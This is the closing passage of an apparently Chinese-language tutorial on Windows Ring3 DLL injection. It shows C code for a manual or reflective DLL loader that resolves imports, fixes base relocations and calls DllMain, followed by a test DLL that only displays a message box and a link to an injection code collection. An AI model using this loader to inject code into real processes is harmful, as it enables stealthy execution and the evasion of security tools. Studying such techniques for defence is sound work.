(PIMAGE_IMPORT_DESCRIPTOR)((PUINT8)NewBaseAddress + ImportDataDirectory.VirtualAddress);/* _asm{int 3;}*//*while (ImportDescriptor->Characteristics != 0){PIMAGE_THUNK_DATA FirstThunk = (PIMAGE_THUNK_DATA)((PUINT8)NewBaseAddress + ImportDescriptor->FirstThunk);PIMAGE_THUNK_DATA OriginalFirstThunk = (PIMAGE_THUNK_DATA)((PUINT8)NewBaseAddress + ImportDescriptor->OriginalFirstThunk);// 獲取導入模塊名稱// char szModuleName[MAX_PATH] = { 0 };PCHAR ModuleName = (PCHAR)((PUINT8)NewBaseAddress + ImportDescriptor->Name);HMODULE Dll = LoadLibraryAAddress(ModuleName);UINT_PTR FunctionAddress = 0;for (INT i = 0; OriginalFirstThunk[i].u1.Function != 0; i++){if (IMAGE_SNAP_BY_ORDINAL(OriginalFirstThunk[i].u1.Ordinal)){FunctionAddress = (UINT_PTR)GetProcAddressAddress(Dll, MAKEINTRESOURCEA((IMAGE_ORDINAL(OriginalFirstThunk[i].u1.Ordinal))));}else{PIMAGE_IMPORT_BY_NAME ImageImportByName = 
(PIMAGE_IMPORT_BY_NAME)((PUINT8)NewBaseAddress + OriginalFirstThunk[i].u1.AddressOfData);FunctionAddress = (UINT_PTR)GetProcAddressAddress(Dll, (CHAR*)ImageImportByName->Name); // 通過函數名稱得到函數地址}FirstThunk[i].u1.Function = FunctionAddress;}ImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((PUINT8)ImportDescriptor + sizeof(IMAGE_IMPORT_DESCRIPTOR));}*/for (INT i = 0; ImportDescriptor[i].Name != NULL; i++){// 加載導入動態庫HMODULE Dll = LoadLibraryAAddress((const CHAR*)((PUINT8)NewBaseAddress + ImportDescriptor[i].Name));PIMAGE_THUNK_DATA OriginalFirstThunk = (PIMAGE_THUNK_DATA)((PUINT8)NewBaseAddress + ImportDescriptor[i].OriginalFirstThunk);PIMAGE_THUNK_DATA FirstThunk = (PIMAGE_THUNK_DATA)((PUINT8)NewBaseAddress + ImportDescriptor[i].FirstThunk);UINT_PTR FunctionAddress = 0;// 遍歷每個導入模塊的函數for (INT j = 0; OriginalFirstThunk[j].u1.Function; j++){if (&OriginalFirstThunk[j] && IMAGE_SNAP_BY_ORDINAL(OriginalFirstThunk[j].u1.Ordinal)){// 序號導入---->這里直接從Dll的導出表中找到函數地址// FunctionAddress = (UINT_PTR)GetProcAddressAddress(Dll, MAKEINTRESOURCEA((IMAGE_ORDINAL(OriginalFirstThunk[j].u1.Ordinal)))); // 除去最高位即為序號DosHeader = (PIMAGE_DOS_HEADER)Dll;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)Dll + DosHeader->e_lfanew);PIMAGE_EXPORT_DIRECTORY ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PUINT8)Dll + NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);// 導出函數地址RVA數組PUINT32 AddressOfFunctions = (PUINT32)((PUINT8)Dll + ExportDirectory->AddressOfFunctions);UINT16 Ordinal = IMAGE_ORDINAL(OriginalFirstThunk[j].u1.Ordinal - ExportDirectory->Base); // 導出函數編號 - Base(導出函數編號的起始值) = 導出函數在函數地址表中序號FunctionAddress = (UINT_PTR)((PUINT8)Dll + AddressOfFunctions[Ordinal]);}else{// 名稱導入PIMAGE_IMPORT_BY_NAME ImageImportByName = (PIMAGE_IMPORT_BY_NAME)((PUINT8)NewBaseAddress + OriginalFirstThunk[j].u1.AddressOfData);FunctionAddress = (UINT_PTR)GetProcAddressAddress(Dll, (CHAR*)ImageImportByName->Name); // 通過函數名稱得到函數地址}// 更新IATFirstThunk[j].u1.Function = FunctionAddress;}}// 
2.4修正重定向表DosHeader = (PIMAGE_DOS_HEADER)LibraryAddress;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)LibraryAddress + DosHeader->e_lfanew);// UINT_PTR Delta = NewBaseAddress - NtHeader->OptionalHeader.ImageBase;IMAGE_DATA_DIRECTORY BaseRelocDataDirectory = (IMAGE_DATA_DIRECTORY)(NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]);// 有無重定向表if (BaseRelocDataDirectory.Size != 0){PIMAGE_BASE_RELOCATION BaseRelocation = (PIMAGE_BASE_RELOCATION)((PUINT8)NewBaseAddress + BaseRelocDataDirectory.VirtualAddress);while (BaseRelocation->SizeOfBlock != 0){typedef struct _IMAGE_RELOC{UINT16 Offset : 12; // 低12位---偏移UINT16 Type : 4; // 高4位---類型} IMAGE_RELOC, *PIMAGE_RELOC;// 定位到重定位塊PIMAGE_RELOC RelocationBlock = (PIMAGE_RELOC)((PUINT8)BaseRelocation + sizeof(IMAGE_BASE_RELOCATION));// 計算需要修正的重定向位項的數目UINT32 NumberOfRelocations = (BaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(UINT16);for (INT i = 0; i < NumberOfRelocations; i++){if (RelocationBlock[i].Type == IMAGE_REL_BASED_DIR64){// 64 位PUINT64 Address = (PUINT64)((PUINT8)NewBaseAddress + BaseRelocation->VirtualAddress + RelocationBlock[i].Offset);UINT64 Delta = (UINT64)NewBaseAddress - NtHeader->OptionalHeader.ImageBase;*Address += Delta;}else if (RelocationBlock[i].Type == IMAGE_REL_BASED_HIGHLOW){// 32 位PUINT32 Address = (PUINT32)((PUINT8)NewBaseAddress + BaseRelocation->VirtualAddress + (RelocationBlock[i].Offset));UINT32 Delta = (UINT32)NewBaseAddress - NtHeader->OptionalHeader.ImageBase;*Address += Delta;}}// 轉到下一張重定向表BaseRelocation = (PIMAGE_BASE_RELOCATION)((PUINT8)BaseRelocation + BaseRelocation->SizeOfBlock);}}// 3.獲得模塊OEPUINT_PTR AddressOfEntryPoint = (UINT_PTR)((PUINT8)NewBaseAddress + NtHeader->OptionalHeader.AddressOfEntryPoint);NtFlushInstructionCacheAddress(INVALID_HANDLE_VALUE, NULL, 0);// 調用通過OEP去調用DllMain((pfnDllMain)AddressOfEntryPoint)((HMODULE)NewBaseAddress, DLL_PROCESS_ATTACH, lParam);/* _asm{int 3;}*/return AddressOfEntryPoint;}// dllmain.cpp : 定義 DLL 
// dllmain.cpp : defines the DLL entry point (continuation of the header comment
// on the previous line).
#include "stdafx.h"
// Entry point of the payload DLL for the manual-load sample. The loader
// (LoadDllByOEP in the listing above) calls this directly with
// DLL_PROCESS_ATTACH after mapping the image; a blank MessageBoxA serves as the
// proof of execution. The thread and detach notifications are no-ops.
// hModule and lpReserved are unused.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        MessageBoxA(0, 0, 0, 0);
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
0x09.總結
也許還有我沒有學習到的Ring3注入Dll的方法,正所謂,路漫漫其修遠兮,吾將上下而求索!
奉上代碼下載地址:https://github.com/YouArekongqi/InjectCollection.git
以上所述是小編給大家介紹的Windows x86/ x64 Ring3層注入Dll總結,希望對大家有所幫助!